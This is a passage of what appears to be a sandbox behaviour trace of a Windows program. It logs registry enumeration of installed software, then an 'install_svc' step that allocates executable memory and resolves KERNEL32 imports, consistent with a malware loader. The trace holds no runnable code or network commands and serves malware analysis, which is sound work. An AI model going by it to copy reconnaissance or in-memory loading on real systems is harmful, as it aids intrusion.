(_Str="{91140000-0057-0000-1000-0000000FF1CE}_Office14.VISIOR_{9081486B-B26D-42DB-8D31-81C525A9526A}") returned 0x5d [0047.630] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.630] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3f, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{929FBD26-9020-399B-9A7A-751D61F0B942}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.630] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{929FBD26-9020-399B-9A7A-751D61F0B942}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.630] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.630] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7c | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.630] wcslen (_String="Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005") returned 0x3d [0047.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0047.630] strlen (_Str="{929FBD26-9020-399B-9A7A-751D61F0B942}") returned 0x26 [0047.631] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.631] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x40, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.631] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.631] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x3a) returned 0x0 [0047.631] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x261ffe8, lpcbData=0x59ffd3c*=0x3a | out: lpType=0x0, lpData=0x261ffe8*=0x4d, lpcbData=0x59ffd3c*=0x3a) returned 0x0 [0047.631] wcslen (_String="Microsoft .NET Framework 4.6") returned 0x1c [0047.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft .NET Framework 4.6", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0047.631] strlen (_Str="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033") returned 0x2d [0047.631] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.631] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x41, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{94A631D5-B30A-3DD8-B65C-1117C09DA73E}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.631] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{94A631D5-B30A-3DD8-B65C-1117C09DA73E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.631] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x3a) returned 0x0 [0047.631] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x261ffe8, lpcbData=0x59ffd3c*=0x3a | out: lpType=0x0, lpData=0x261ffe8*=0x4d, lpcbData=0x59ffd3c*=0x3a) returned 0x0 [0047.631] wcslen (_String="Microsoft .NET Framework 4.6") returned 0x1c [0047.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft .NET Framework 4.6", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0047.631] strlen (_Str="{94A631D5-B30A-3DD8-B65C-1117C09DA73E}") returned 0x26 [0047.631] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.631] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x42, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.631] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.631] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.631] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x76 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.631] wcslen (_String="Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005") returned 0x3a [0047.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0047.632] strlen (_Str="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}") returned 0x26 [0047.632] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.632] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x43, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.632] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.632] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x60) returned 0x0 [0047.632] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2627918, lpcbData=0x59ffd3c*=0x60 | out: lpType=0x0, lpData=0x2627918*=0x4d, lpcbData=0x59ffd3c*=0x60) returned 0x0 [0047.632] wcslen (_String="Microsoft Visual C++ 2005 Redistributable (x64)") returned 0x2f [0047.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2005 Redistributable (x64)", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0047.632] strlen (_Str="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}") returned 0x26 [0047.632] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.632] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x44, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.632] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.632] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.632] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x76 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.632] wcslen (_String="Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030") returned 0x3a [0047.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0047.632] strlen (_Str="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}") returned 0x26 [0047.632] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.632] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x45, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.632] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.632] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.632] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7e | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.633] wcslen (_String="Microsoft Visual C++ 2017 x64 Additional Runtime - 14.10.25017") returned 0x3e [0047.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x64 Additional Runtime - 14.10.25017", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0047.633] strlen (_Str="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}") returned 0x26 [0047.633] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.633] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x46, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0047.633] RegCloseKey (hKey=0x2b0) returned 0x0 [0047.633] strlen (_Str="Adobe Flash Player 10 Plugin") returned 0x1c [0047.633] strlen (_Str="Google Chrome") returned 0xd [0047.633] strlen (_Str="Mozilla Firefox 25.0 (x86 en-US)") returned 0x20 [0047.633] strlen (_Str="Mozilla Maintenance Service") returned 0x1b [0047.633] strlen (_Str="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned 0x3a [0047.633] strlen (_Str="Java 7 Update 45") returned 0x10 [0047.633] strlen (_Str="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned 0x3c [0047.633] strlen (_Str="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned 0x3c [0047.633] strlen (_Str="Java Auto Updater") returned 0x11 [0047.633] strlen (_Str="Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25017") returned 0x3b [0047.633] strlen (_Str="Microsoft Visual C++ 2017 x86 Additional Runtime - 14.10.25017") returned 0x3e [0047.633] strlen (_Str="Microsoft Visual C++ 2005 Redistributable") returned 0x29 [0047.634] strlen (_Str="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned 0x3e [0047.634] strlen (_Str="Adobe Reader X MUI") returned 0x12 [0047.634] strlen (_Str="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned 0x3d [0047.634] strlen (_Str="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned 0x3a [0047.634] strlen (_Str="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned 0x3c [0047.634] strlen (_Str="Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25017") returned 0x3d [0047.634] strlen (_Str="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned 0x3c [0047.634] strlen (_Str="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned 0x3b [0047.634] strlen (_Str="Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017") returned 0x3d [0047.634] strlen (_Str="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned 0x3d [0047.634] strlen (_Str="Microsoft Project Professional 2010") returned 0x23 [0047.634] strlen (_Str="Microsoft Office Professional Plus 2010") returned 0x27 [0047.634] strlen (_Str="Microsoft Visio Professional 2010") returned 0x21 [0047.634] strlen (_Str="Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219") returned 0x3b [0047.634] strlen (_Str="Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030") returned 0x3d [0047.634] strlen (_Str="Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161") returned 0x3e [0047.634] strlen (_Str="Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.10.25017") returned 0x3b [0047.635] strlen (_Str="Microsoft Office Access MUI (English) 2010") returned 0x2a [0047.635] strlen (_Str="Microsoft Office Excel MUI (English) 2010") returned 0x29 [0047.635] strlen (_Str="Microsoft Office PowerPoint MUI (English) 2010") returned 0x2e [0047.635] strlen (_Str="Microsoft Office Publisher MUI (English) 2010") returned 0x2d [0047.635] strlen (_Str="Microsoft Office Outlook MUI (English) 2010") returned 0x2b [0047.635] strlen (_Str="Microsoft Office Word MUI (English) 2010") returned 0x28 [0047.635] strlen (_Str="Microsoft Office Proof (English) 2010") returned 0x25 [0047.635] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.635] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.635] strlen (_Str="Microsoft Office Proof (French) 2010") returned 0x24 [0047.635] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.635] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.635] strlen (_Str="Microsoft Office Proof (Spanish) 2010") returned 0x25 [0047.635] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.635] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.635] strlen (_Str="Microsoft Office Proofing (English) 2010") returned 0x28 [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office Office 32-bit Components 2010") returned 0x2e [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office Shared 32-bit MUI (English) 2010") returned 0x31 [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office InfoPath MUI (English) 2010") returned 0x2c [0047.636] strlen (_Str="Microsoft Office Visio MUI (English) 2010") returned 0x29 [0047.636] strlen (_Str="Microsoft Office 2010 Language Pack Service Pack 1 (SP1)") returned 0x38 [0047.636] strlen (_Str="Microsoft Office Shared MUI (English) 2010") returned 0x2a [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.636] strlen (_Str="Microsoft Office OneNote MUI (English) 2010") returned 0x2b [0047.637] strlen (_Str="Microsoft Office Project MUI (English) 2010") returned 0x2b [0047.637] strlen (_Str="Microsoft Project 2010 Service Pack 1 (SP1)") returned 0x2b [0047.637] strlen (_Str="Microsoft Office Groove MUI (English) 2010") returned 0x2a [0047.637] strlen (_Str="Microsoft Office Shared Setup Metadata MUI (English) 2010") returned 0x39 [0047.637] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.637] strlen (_Str="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.637] strlen (_Str="Microsoft Office Access Setup Metadata MUI (English) 2010") returned 0x39 [0047.637] strlen (_Str="Microsoft Office Professional Plus 2010") returned 0x27 [0047.637] strlen (_Str="Microsoft Office Project Professional 2010") returned 0x2a [0047.637] strlen (_Str="Microsoft Project 2010 Service Pack 1 (SP1)") returned 0x2b [0047.637] strlen (_Str="Microsoft Office Visio 2010") returned 0x1b [0047.637] strlen (_Str="Microsoft Visio 2010 Service Pack 1 (SP1)") returned 0x29 [0047.637] strlen (_Str="Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005") returned 0x3d [0047.637] strlen (_Str="Microsoft .NET Framework 4.6") returned 0x1c [0047.637] strlen (_Str="Microsoft .NET Framework 4.6") returned 0x1c [0047.637] strlen (_Str="Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005") returned 0x3a [0047.638] strlen (_Str="Microsoft Visual C++ 2005 Redistributable (x64)") returned 0x2f [0047.638] strlen (_Str="Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030") returned 0x3a [0047.638] strlen (_Str="Microsoft Visual C++ 2017 x64 Additional Runtime - 14.10.25017") returned 0x3e [0047.640] strlen (_Str="core") returned 0x4 [0047.640] GetCurrentThreadId () returned 0xadc [0047.640] GetCurrentThreadId () returned 0xadc [0047.640] PostQueuedCompletionStatus (CompletionPort=0x268, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x26213b4) returned 1 [0047.642] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0x7530) returned 0x0 [0047.642] CloseHandle (hObject=0x2b8) returned 1 [0047.878] PostQueuedCompletionStatus (CompletionPort=0x268, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x26213b4) returned 1 [0047.880] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0x7530) returned 0x0 [0047.880] CloseHandle (hObject=0x2b8) returned 1 Thread: id = 45 os_tid = 0x5b0 [0078.894] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.894] GetCurrentThreadId () returned 0x5b0 [0078.894] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0078.894] GetLastError () returned 0x3e5 [0078.894] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.894] GetCurrentThreadId () returned 0x5b0 [0078.894] WriteFile (in: hFile=0x268, lpBuffer=0x2605ae8, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2605ae8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 0 [0078.894] GetLastError () returned 0x3e5 [0078.894] SetEvent (hEvent=0x260) returned 1 [0078.895] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.895] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.895] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0078.895] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.895] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0078.895] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.896] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0078.896] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.896] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0078.896] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.896] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0078.896] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.896] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0078.896] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.896] strlen (_Str="install_svc") returned 0xb [0078.896] RtlImageNtHeader (BaseAddress=0x263a7d3) returned 0x263a8db [0078.896] VirtualAlloc (lpAddress=0x0, dwSize=0xa000, flAllocationType=0x3000, flProtect=0x40) returned 0x1c90000 [0078.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76600000 [0078.899] GetProcAddress (hModule=0x76600000, lpProcName="WriteFile") returned 0x76611282 [0078.899] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x76611410 [0078.899] GetProcAddress (hModule=0x76600000, lpProcName="CreateDirectoryW") returned 0x76614259 [0078.899] GetProcAddress (hModule=0x76600000, lpProcName="GetLastError") returned 0x766111c0 [0078.899] GetProcAddress (hModule=0x76600000, lpProcName="WideCharToMultiByte") returned 0x7661170d [0078.899] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcess") returned 0x76611809 [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="EnterCriticalSection") returned 0x76f922b0 [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="LeaveCriticalSection") returned 0x76f92270 [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="GetTickCount") returned 0x7661110c [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventW") returned 0x7661183e [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="WaitForSingleObject") returned 0x76611136 [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="InitializeCriticalSection") returned 0x76fa2c42 [0078.900] GetProcAddress (hModule=0x76600000, lpProcName="SetEvent") returned 0x766116c5 [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="UnhandledExceptionFilter") returned 0x7663772f [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="TerminateProcess") returned 0x7662d802 [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="RtlUnwind") returned 0x7663d1c3 [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="SetUnhandledExceptionFilter") returned 0x766187c9 [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileW") returned 0x76613f5c [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="QueryPerformanceCounter") returned 0x76611725 [0078.901] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTimeAsFileTime") returned 0x76613509 [0078.902] GetProcAddress (hModule=0x76600000, lpProcName="FindClose") returned 0x76614442 [0078.902] GetProcAddress (hModule=0x76600000, lpProcName="GetFileAttributesW") returned 0x76611b18 [0078.902] GetProcAddress (hModule=0x76600000, lpProcName="FindNextFileW") returned 0x766154ee [0078.902] GetProcAddress 